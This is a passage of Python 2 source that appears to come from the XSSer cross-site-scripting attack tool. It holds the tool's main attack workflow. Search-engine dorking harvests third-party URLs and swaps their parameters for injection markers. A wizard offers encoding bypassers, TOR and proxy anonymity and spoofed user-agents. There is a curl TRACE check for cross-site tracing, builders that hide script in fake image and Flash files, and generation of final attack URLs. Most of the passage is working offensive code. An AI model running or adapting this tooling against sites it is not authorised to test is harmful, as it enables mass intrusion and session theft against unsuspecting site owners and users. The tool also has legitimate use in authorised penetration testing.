self.options.fuzz = True # autofuzzing self.options.coo = True # COO self.options.xsa = True # XSA self.options.xsr = True # XSR self.options.dcp = True # DCP self.options.dom = True # DOM self.options.inducedcode = True # Induced self.options.fileoutput = True # Important: export results to file (.raw) self.options.filexml = "XSSer_" + str(self.options.target) + "_" + str(datetime.datetime.now())+".xml" # export xml self.check_trace() # XST urls = [options.target] if options.url: self.report('='*75) self.report(str(p.version)) self.report('='*75) if self.options.crawling: self.report("Testing [XSS from CRAWLER]...") else: self.report("Testing [XSS from URL]...") self.report('='*75) urls = [options.url] elif options.readfile: self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("Testing [XSS from FILE]...") self.report('='*75) try: f = open(options.readfile) urls = f.readlines() urls = [ line.replace('\n','') for line in urls ] f.close() except: import os.path if os.path.exists(options.readfile) == True: self.report('\nThere are some errors opening the file: ', options.readfile, "\n") else: self.report('\nCannot found file: ', options.readfile, "\n") elif options.dork: # dork a query self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("Testing [XSS from DORK]... Good luck! ;-)") self.report('='*75) if options.dork_mass: # massive dorkering for e in self.search_engines: try: dorker = Dorker(e) urls = dorker.dork(options.dork) i = 0 for u in urls: # replace original parameter for injection keyword (XSS) p_uri = urlparse(u) uri = p_uri.netloc path = p_uri.path target_params = parse_qs(urlparse(u).query, keep_blank_values=True) for key, value in target_params.iteritems(): # parse params to apply keywords for v in value: target_params[key] = 'XSS' target_url_params = urllib.urlencode(target_params) u = p_uri.scheme + "://" + uri + path + "?" + target_url_params urls[i] = u i = i + 1 except Exception, e: for reporter in self._reporters: reporter.mosquito_crashed(dorker.search_url, str(e.message)) else: if urls is not None: for url in urls: for reporter in self._reporters: reporter.add_link(dorker.search_url, url) else: if not options.dork_engine: options.dork_engine = 'duck' # default search engine [26-08/2019] dorker = Dorker(options.dork_engine) try: urls = dorker.dork(options.dork) i = 0 for u in urls: # replace original parameter for injection keyword (XSS) p_uri = urlparse(u) uri = p_uri.netloc path = p_uri.path target_params = parse_qs(urlparse(u).query, keep_blank_values=True) for key, value in target_params.iteritems(): # parse params to apply keywords for v in value: target_params[key] = 'XSS' target_url_params = urllib.urlencode(target_params) u = p_uri.scheme + "://" + uri + path + "?" + target_url_params urls[i] = u i = i + 1 except Exception, e: for reporter in self._reporters: reporter.mosquito_crashed(dorker.search_url, str(e.message)) else: if urls is not None: for url in urls: for reporter in self._reporters: reporter.add_link(dorker.search_url, url) elif options.dork_file: # dork from file ('core/fuzzing/dorks.txt') self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("Testing [XSS from DORK]... Good luck! ;-)") self.report('='*75) try: f = open('core/fuzzing/dorks.txt') dorks = f.readlines() dorks = [ dork.replace('\n','') for dork in dorks ] f.close() if not dorks: print "\n[Error] - Imposible to retrieve 'dorks' from file.\n" return except: if os.path.exists('core/fuzzing/dorks.txt') == True: print '[Error] - Cannot open:', 'dorks.txt', "\n" return else: print '[Error] - Cannot found:', 'dorks.txt', "\n" return if not options.dork_engine: options.dork_engine = 'duck' # default search engine [26-08/2019] if options.dork_mass: # massive dorkering for e in self.search_engines: try: dorker = Dorker(e) for dork in dorks: urls = dorker.dork(dork) i = 0 for u in urls: # replace original parameter for injection keyword (XSS) p_uri = urlparse(u) uri = p_uri.netloc path = p_uri.path target_params = parse_qs(urlparse(u).query, keep_blank_values=True) for key, value in target_params.iteritems(): # parse params to apply keywords for v in value: target_params[key] = 'XSS' target_url_params = urllib.urlencode(target_params) u = p_uri.scheme + "://" + uri + path + "?" + target_url_params urls[i] = u i = i + 1 except Exception, e: for reporter in self._reporters: reporter.mosquito_crashed(dorker.search_url, str(e.message)) else: if urls is not None: for url in urls: for reporter in self._reporters: reporter.add_link(dorker.search_url, url) else: dorker = Dorker(options.dork_engine) try: for dork in dorks: urls = dorker.dork(dork) i = 0 for u in urls: # replace original parameter for injection keyword (XSS) p_uri = urlparse(u) uri = p_uri.netloc path = p_uri.path target_params = parse_qs(urlparse(u).query, keep_blank_values=True) for key, value in target_params.iteritems(): # parse params to apply keywords for v in value: target_params[key] = 'XSS' target_url_params = urllib.urlencode(target_params) u = p_uri.scheme + "://" + uri + path + "?" + target_url_params urls[i] = u i = i + 1 except Exception, e: for reporter in self._reporters: reporter.mosquito_crashed(dorker.search_url, str(e.message)) else: if urls is not None: for url in urls: for reporter in self._reporters: reporter.add_link(dorker.search_url, url) if options.crawling: # crawlering target(s) nthreads = options.threads self.crawled_urls = list(urls) all_crawled = [] try: self.options.crawling = int(self.options.crawling) except: self.options.crawling = 50 if self.options.crawler_width == None: self.options.crawler_width = 2 # default crawlering-width else: try: self.options.crawler_width = int(self.options.crawler_width) except: self.options.crawler_width = 2 # default crawlering-width if self.options.crawler_local == None: self.options.crawler_local = False # default crawlering to LOCAL for url in set(urls): self.report("\n[Info] Crawlering TARGET:", url, "\n\n - Max. limit: "+ str(self.options.crawling)+ " \n - Deep level: "+ str(options.crawler_width)) crawler = Crawler(self, Curl, all_crawled, self.pool) crawler.set_reporter(self) # now wait for all results to arrive while urls: self.run_crawl(crawler, urls.pop(), options) while not self._landing: for reporter in self._reporters: reporter.report_state('broad scanning') try: self.pool.poll() except NoResultsPending: crawler.cancel() break if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests: self.report("\n[Info] Found enough results... calling all mosquitoes to home!") crawler.cancel() break time.sleep(0.1) # re-parse crawled urls from main parsed_crawled_urls = [] for u in self.crawled_urls: if "XSS" in u: parsed_crawled_urls.append(u) else: pass self.crawled_urls = parsed_crawled_urls # report parsed crawled urls self.report("\n" + "-"*25) self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)") if self.options.verbose: self.report("") for u in self.crawled_urls: if '/XSS' in u: u = u.replace("/XSS", "") print " - " + str(u) if len(self.crawled_urls) > 0: self.report("") else: self.report("-"*25) self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n") return self.crawled_urls if not options.imx or not options.flash or not options.xsser_gtk or not options.update: return urls def run_crawl(self, crawler, url, options): def _cb(request, result): pass def _error_cb(request, error): for reporter in self._reporters: reporter.mosquito_crashed(url, str(error[0])) traceback.print_tb(error[2]) def crawler_main(args): return crawler.crawl(*args) crawler.crawl(url, int(options.crawler_width), int(options.crawling),options.crawler_local) def poll_workers(self): try: self.pool.poll() except NoResultsPending: pass def try_running(self, func, error, args=[]): """ Try running a function and print some error if it fails and exists with a fatal error. """ try: return func(*args) except Exception, e: self.report(error) if DEBUG: traceback.print_exc() def check_trace(self): """ Check for Cross Site Tracing (XST) vulnerability: 1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules) 2) check data sent on reply """ agents = [] # user-agents try: f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents except: f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing for line in f: agents.append(line) agent = random.choice(agents).strip() # set random user-agent referer = '' import subprocess, shlex self.report('='*75) self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n") if self.options.xst: xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE) if self.options.target: xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE) line1 = xst.stdout.readline() if self.options.verbose: print "-"*25 + "\n" while True: line = xst.stdout.readline() if line != '': print line.rstrip() else: break self.report("") self.report('-'*50+"\n") if "200 OK" in line1.rstrip(): print "[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n" else: print "[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n" if self.options.target: self.report('='*75) def start_wizard(self): """ Start Wizard Helper """ #step 0: Menu ans1=True ans2=True ans3=True ans4=True ans5=True ans6=True #step 1: Where while ans1: print("""\nA)- Where are your targets?\n [1]- I want to enter the url of my target directly. [2]- I want to enter a list of targets from a .txt file. *[3]- I don't know where are my target(s)... I just want to explore! :-) [e]- Exit/Quit/Abort. """) ans1 = raw_input("Your choice: [1], [2], [3] or [e]xit\n") if ans1 == "1": # from url url = raw_input("Target url (ex: http(s)://target.com): ") if url.startswith("http"): ans1 = None else: print "\n[Error] Your url is not valid!. Try again!" pass elif ans1 == "2": # from file url = raw_input("Path to file (ex: 'targets_list.txt'): ") if url == None: print "\n[Error] Your are not providing a valid file. Try again!" pass else: ans1 = None elif ans1 == "3": # dorking url = "DORKING" ans1 = None elif (ans1 == "e" or ans1 == "E"): print "Closing wizard..." ans1=None ans2=None ans3=None ans4=None ans5=None ans6=None else: print "\nNot valid choice. Try again!" #step 2: How while ans2: print 22*"-" print("""\nB)- How do you want to connect?\n [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly. [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly. [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible. *[4]- I don't know how to connect... Just do it! :-) [e]- Exit/Quit/Abort. """) ans2 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n") if ans2 == "1": # using GET payload = raw_input("GET payload (ex: '/menu.php?q='): ") if payload == None: print "\n[Error] Your are providing an empty payload. Try again!" pass else: self.user_template_conntype = "GET" ans2 = None elif ans2 == "2": # using POST payload = raw_input("POST payload (ex: 'foo=1&bar='): ") if payload == None: print "\n[Error] Your are providing an empty payload. Try again!" pass else: self.user_template_conntype = "POST" ans2 = None elif ans2 == "3": # crawlering payload = "CRAWLER" ans2 = None elif ans2 == "4": # crawlering payload = "CRAWLER" ans2 = None elif (ans2 == "e" or ans2 == "E"): print "Closing wizard..." ans2=None ans3=None ans4=None ans5=None ans6=None else: print "\nNot valid choice. Try again!" #step 3: Proxy while ans3: print 22*"-" print("""\nC)- Do you want to be 'anonymous'?\n [1]- Yes. I want to use my proxy and apply automatic spoofing methods. [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: *[3]- Yes. But I haven't any proxy. :-) [4]- No. It's not a problem for me to connect directly to the target(s). [e]- Exit/Quit. """) ans3 = raw_input("Your choice: [1], [2], [3], [4] or [e]xit\n") if ans3 == "1": # using PROXY + spoofing proxy = raw_input("Enter proxy [http(s)://server:port]: ") ans3 = None elif ans3 == "2": # using TOR + spoofing proxy = 'Using TOR (default:' proxy = '' ans3 = None elif ans3 == "3": # only spoofing proxy = 'Proxy: No - Spoofing: Yes' ans3 = None elif ans3 == "4": # no spoofing proxy = 'Proxy: No - Spoofing: No' ans3 = None elif (ans3 == "e" or ans3 == "E"): print "Closing wizard..." ans3=None ans4=None ans5=None ans6=None else: print "\nNot valid choice. Try again!" #step 4: Bypasser(s) while ans4: print 22*"-" print("""\nD)- Which 'bypasser(s' do you want to use?\n [1]- I want to inject XSS scripts without any encoding. [2]- Try to inject code using 'Hexadecimal'. [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'. [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex). *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-) [e]- Exit/Quit. """) ans4 = raw_input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n") if ans4 == "1": # no encode enc = "Not using encoders" ans4 = None elif ans4 == "2": # enc: Hex enc = 'Hex' ans4 = None elif ans4 == "3": # enc: Str+Une enc = 'Str+Une' ans4 = None elif ans4 == "4": # enc: Mix: Une+Str+Hex enc = "Une,Str,Hex" ans4 = None elif ans4 == "5": # enc: no encode enc = 'Not using encoders' ans4 = None elif (ans4 == "e" or ans4 == "E"): print "Closing wizard..." ans4=None ans5=None ans6=None else: print "\nNot valid choice. Try again!" #step 5: Exploiting while ans5: print 22*"-" print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n [1]- I want to inject a classic "Alert" message box. [2]- I want to inject my own scripts. *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-) [e]- Exit/Quit. """) ans5 = raw_input("Your choice: [1], [2], [3] or [e]xit\n") if ans5 == "1": # alertbox script = 'Alertbox' ans5 = None elif ans5 == "2": # manual script = raw_input("Enter code (ex: '>): ") if script == None: print "\n[Error] Your are providing an empty script to inject. Try again!" pass else: ans5 = None elif ans5 == "3": # no exploit script = 'Not exploiting code' ans5 = None elif (ans5 == "e" or ans5 == "E"): print "Closing wizard..." ans5=None ans6=None else: print "\nNot valid choice. Try again!" #step 6: Final while ans6: print 22*"-" print "\nVery nice!. That's all. Your last step is to -accept or not- this template.\n" print "A)- Target:", url print "B)- Payload:", payload print "C)- Privacy:", proxy print "D)- Bypasser(s):", enc print "E)- Final:", script print(""" [Y]- Yes. Accept it and start testing!. [N]- No. Abort it?. """) ans6 = raw_input("Your choice: [Y] or [N]\n") if (ans6 == "y" or ans6 == "Y"): # YES start = 'YES' print 'Good fly... and happy "Cross" hacking !!! :-)\n' ans6 = None elif (ans6 == "n" or ans6 == "N"): # NO start = 'NO' print "Aborted!. Closing wizard..." ans6 = None else: print "\nNot valid choice. Try again!" if url and payload and proxy and enc and script: return url, payload, proxy, enc, script else: return def create_fake_image(self, filename, payload): """ Create -fake- image with code injected """ options = self.options filename = options.imx payload = options.script image_xss_injections = ImageInjections() image_injections = image_xss_injections.image_xss(options.imx , options.script) return image_injections def create_fake_flash(self, filename, payload): """ Create -fake- flash movie (.swf) with code injected """ options = self.options filename = options.flash payload = options.script flash_xss_injections = FlashInjections() flash_injections = flash_xss_injections.flash_xss(options.flash, options.script) return flash_injections def create_gtk_interface(self): """ Create GTK Interface """ options = self.options from core.gtkcontroller import Controller, reactor uifile = "xsser.ui" controller = Controller(uifile, self) self._reporters.append(controller) if reactor: reactor.run() else: import gtk gtk.main() return controller def run(self, opts=None): """ Run xsser. """ self._landing = False for reporter in self._reporters: reporter.start_attack() if opts: options = self.create_options(opts) self.set_options(options) if not self.mothership and not self.hub: self.hub = HubThread(self) self.hub.start() options = self.options # step -1; order attacks if self.options.hash: # not fuzzing/heuristic when hash precheck self.options.fuzz = False self.options.script = False self.options.coo = False self.options.xsa = False self.options.xsr = False self.options.dcp = False self.options.dom = False self.options.inducedcode = False self.options.heuristic = False if self.options.heuristic: # not fuzzing/hash when heuristic precheck self.options.fuzz = False self.options.script = False self.options.coo = False self.options.xsa = False self.options.xsr = False self.options.dcp = False self.options.dom = False self.options.inducedcode = False self.options.hash = False if self.options.Cem: # parse input at CEM for blank spaces self.options.Cem = self.options.Cem.replace(" ","") # step 0: third party tricks try: if self.options.imx: # create -fake- image with code injected p = self.optionParser self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("[Image XSS Builder]...") self.report('='*75) self.report(''.join(self.create_fake_image(self.options.imx, self.options.script))) self.report('='*75 + "\n") except: return if options.flash: # create -fake- flash movie (.swf) with code injected p = self.optionParser self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("[Flash Attack! XSS Builder]...") self.report('='*75) self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script))) self.report('='*75 + "\n") if options.xsser_gtk: self.create_gtk_interface() return if self.options.wizard: # start a wizard helper p = self.optionParser self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("[Wizard] Generating XSS attack...") self.report('='*75) self.user_template = self.start_wizard() if self.options.xst: # check for cross site tracing p = self.optionParser if not self.options.target: self.report('='*75) self.report(str(p.version)) self.report('='*75) self.report("[XST Attack!] checking for HTTP TRACE method ...") self.report('='*75) self.check_trace() if options.checktor: url = self.check_tor_url # TOR status checking site print '='*75 print "" print " _ " print " /_/_ .'''. " print " =O(_)))) ...' `. " print " \_\ `. .'''" print " `..' " print "" print '='*75 agents = [] # user-agents try: f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents except: f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing for line in f: agents.append(line) agent = random.choice(agents).strip() # set random user-agent referer = "" print "\nSending request to: " + url + "\n" print "-"*25+"\n" headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer try: import urllib2 req = urllib2.Request(url, None, headers) tor_reply = urllib2.urlopen(req).read() your_ip = tor_reply.split('')[1].split('')[0].strip() # extract public IP if not tor_reply or 'Congratulations' not in tor_reply: print("It seems that Tor is not properly set.\n") print("IP address appears to be: " + your_ip + "\n") else: print("Congratulations!. Tor is properly being used :-)\n") print("IP address appears to be: " + your_ip + "\n") except: print("[Error] Cannot reach TOR checker system!. Are you connected?\n") sys.exit(2) # return nthreads = max(1, abs(options.threads)) nworkers = len(self.pool.workers) if nthreads != nworkers: if nthreads < nworkers: self.pool.dismissWorkers(nworkers-nthreads) else: self.pool.createWorkers(nthreads-nworkers) for reporter in self._reporters: reporter.report_state('scanning') # step 1: get urls urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n") for reporter in self._reporters: reporter.report_state('arming') # step 2: get payloads payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n") for reporter in self._reporters: reporter.report_state('cloaking') if options.Dwo: payloads = self.process_payloads_ipfuzzing(payloads) elif options.Doo: payloads = self.process_payloads_ipfuzzing_octal(payloads) for reporter in self._reporters: reporter.report_state('locking targets') # step 3: get query string query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n") for reporter in self._reporters: reporter.report_state('sanitize') urls = self.sanitize_urls(urls) for reporter in self._reporters: reporter.report_state('attack') # step 4: perform attack self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string)) for reporter in self._reporters: reporter.report_state('reporting') if len(self.final_attacks): self.report("[Info] Waiting for tokens to arrive...") while self._ongoing_requests and not self._landing: if not self.pool: self.mothership.poll_workers() else: self.poll_workers() time.sleep(0.2) for reporter in self._reporters: reporter.report_state('final sweep...') if self.pool: self.pool.dismissWorkers(len(self.pool.workers)) self.pool.joinAllDismissedWorkers() start = time.time() while not self._landing and len(self.final_attacks) and time.time() - start < 5.0: time.sleep(0.2) for reporter in self._reporters: reporter.report_state('landing... '+str(int(5.0 - (time.time() - start)))) if self.final_attacks: self.report("-"*25+"\n") self.report("[Info] Generating 'token' url:\n") for final_attack in self.final_attacks.itervalues(): if not final_attack['url'] == None: self.report(final_attack['url'] , "\n") self.report("="*50+"\n") self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n") self.report(",".join(self.successful_urls), "\n") self.report("="*50 + "\n") for reporter in self._reporters: reporter.end_attack() self.report("="*50) if self.mothership: self.mothership.remove_reporter(self) self.report("Mosquito(es) landed!") else: self.report("Mosquito(es) landed!") self.report("="*50) self.print_results() def sanitize_urls(self, urls): all_urls = set() if urls is not None: for url in urls: if url.startswith("http://") or url.startswith("https://"): self.urlspoll.append(url) all_urls.add(url) else: if self.options.crawling: self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n") else: self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n") url = None else: self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n") return all_urls def land(self, join=False): self._landing = True if self.hub: self.hub.shutdown() if join: self.hub.join() self.hub = None def _prepare_extra_attacks(self, payload): """ Setup extra attacks. """ options = self.options agents = [] # user-agents try: f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents except: f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing for line in f: agents.append(line) extra_agent = random.choice(agents).strip() # set random user-agent extra_referer = "" extra_cookie = None if self.options.script: if 'XSS' in payload['payload']: payload['payload'] = payload['payload'].replace("XSS","PAYLOAD") if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']: if options.xsa: hashing = self.generate_hash('xsa') agent = payload['payload'].replace('PAYLOAD', hashing) self._ongoing_attacks['xsa'] = hashing self.xsa_injection = self.xsa_injection + 1 self.options.agent = agent extra_agent = agent self.extra_hashed_injections[hashing] = "XSA", payload['payload'] if options.xsr: hashing = self.generate_hash('xsr') referer = payload['payload'].replace('PAYLOAD', hashing) self._ongoing_attacks['xsr'] = hashing self.xsr_injection = self.xsr_injection + 1 self.options.referer = referer extra_referer = referer self.extra_hashed_injections[hashing] = "XSR", payload['payload'] if options.coo: hashing = self.generate_hash('cookie') cookie = payload['payload'].replace('PAYLOAD', hashing) self._ongoing_attacks['coo'] = hashing self.coo_injection = self.coo_injection + 1 self.options.cookie = cookie extra_cookie = cookie self.extra_hashed_injections[hashing] = "COO", payload['payload'] return extra_agent, extra_referer, extra_cookie def attack(self, urls, payloads, query_string): """ Perform an attack on the given urls with the provided payloads and query_string. """ for url in urls: if self.pool: self.poll_workers() else: self.mothership.poll_workers() if not self._landing: self.attack_url(url, payloads, query_string) def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url): """ Generate a real attack url by using data from a successful test. This method also applies DOM stealth mechanisms. """ user_attack_payload = payload['payload'] if self.options.finalpayload: user_attack_payload = self.options.finalpayload elif self.options.finalremote: user_attack_payload = '' elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]": user_attack_payload = '' do_anchor_payload = self.options.anchor anchor_data = None attack_hash = None if do_anchor_payload: # DOM Shadows! dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload) dest_url = dest_url.replace('?', '#') else: dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload) if attack_hash: self.final_attacks[attack_hash] = {'url':dest_url} return dest_url def token_arrived(self, attack_hash): if not self.mothership: # only the mothership calls on token arriving. self.final_attack_callback(attack_hash) def final_attack_callback(self, attack_hash): if attack_hash in self.final_attacks: dest_url = self.final_attacks[attack_hash]['url'] self.report('[*] Browser check:', dest_url) for reporter in self._reporters: reporter.add_checked(dest_url) if self._reporter: from twisted.internet import reactor reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url) self.final_attacks.pop(attack_hash) def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url): real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url) #generate_shorturls = self.options.shorturls #if generate_shorturls: # shortener = ShortURLReservations(self.options.shorturls) # if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos: # shorturl = shortener.process_url(real_attack_url) # self.report("[/] Shortered URL (Final Attack):", shorturl) # else: # shorturl = shortener.process_url(dest_url) # self.report("[/] Shortered URL (Injection):", shorturl) return real_attack_url def report(self, *args): args = list(map(lambda s: str(s), args)) formatted = " ".join(args) if not self.options.silent: print(formatted) for reporter in self._reporters: reporter.post(formatted) def print_results(self): """ Print results from attack. """ self.report('\n' + '='*75) total_injections = len(self.hash_found) + len(self.hash_notfound) if len(self.hash_found) + len(self.hash_notfound) == 0: pass elif self.options.heuristic: pass else: self.report("[*] Final Results:") self.report('='*75 + '\n') self.report("- Injections:", total_injections) self.report("- Failed:", len(self.hash_notfound)) self.report("- Successful:", len(self.hash_found)) try: _accur = len(self.hash_found) * 100 / total_injections except ZeroDivisionError: _accur = 0 self.report("- Accur: %s %%\n" % _accur) if not len(self.hash_found) and self.hash_notfound: self.report('='*75 + '\n') pass else: self.report('='*75) self.report("[*] List of XSS injections:") self.report('='*75 + '\n') if self.options.reversecheck: self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n") else: self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n") self.report("---------------------" + "\n") if self.options.fileoutput: fout = open("XSSreport.raw", "w") # write better than append for line in self.hash_found: if self.options.heuristic or self.options.hash: # not final attack possible when checking pass else: attack_url = self.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6]) if line[2] == "XSR": self.xsr_found = self.xsr_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: Referer Injection") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", str(Curl.referer)) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[2] == "XSR": if h[4]: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[2] == "XSA": self.xsa_found = self.xsa_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: User-Agent Injection") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", str(Curl.agent)) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[2] == "XSA": if h[4]: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[2] == "COO": self.coo_found = self.coo_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: Cookie Injection") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", str(Curl.cookie)) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[2] == "COO": if h[4]: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[4]) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FOUND!\n\n") fout.write("="*75 + "\n\n") elif line[1] == "[Data Control Protocol Injection]": self.dcp_found = self.dcp_found + 1 if len(self.hash_found) < 11: if line[4]: # when query string self.report("[+] Target:", line[6] + " | " + line[4]) else: self.report("[+] Target:", line[6]) self.report("[+] Vector: [ " + str(line[2]) + " ]") self.report("[!] Method: DCP") self.report("[*] Hash:", line[3]) self.report("[*] Payload:", line[0]) self.report("[!] Vulnerable: DCP (Data Control Protocol)") if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: self.report("[*] Final Attack:", attack_url) self.report("[!] Status: XSS FOUND!", "\n", '-'*50, "\n") if self.options.fileoutput: fout.write("="*75) fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n") fout.write("="*75 + "\n\n") for h in self.hash_found: if h[4]: if h[1] == "[Data Control Protocol Injection]": if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[!] Status: XSS FOUND!\n\n") else: if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP (Data Control Protocol)" + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n") else: fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: DCP" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + "DCP 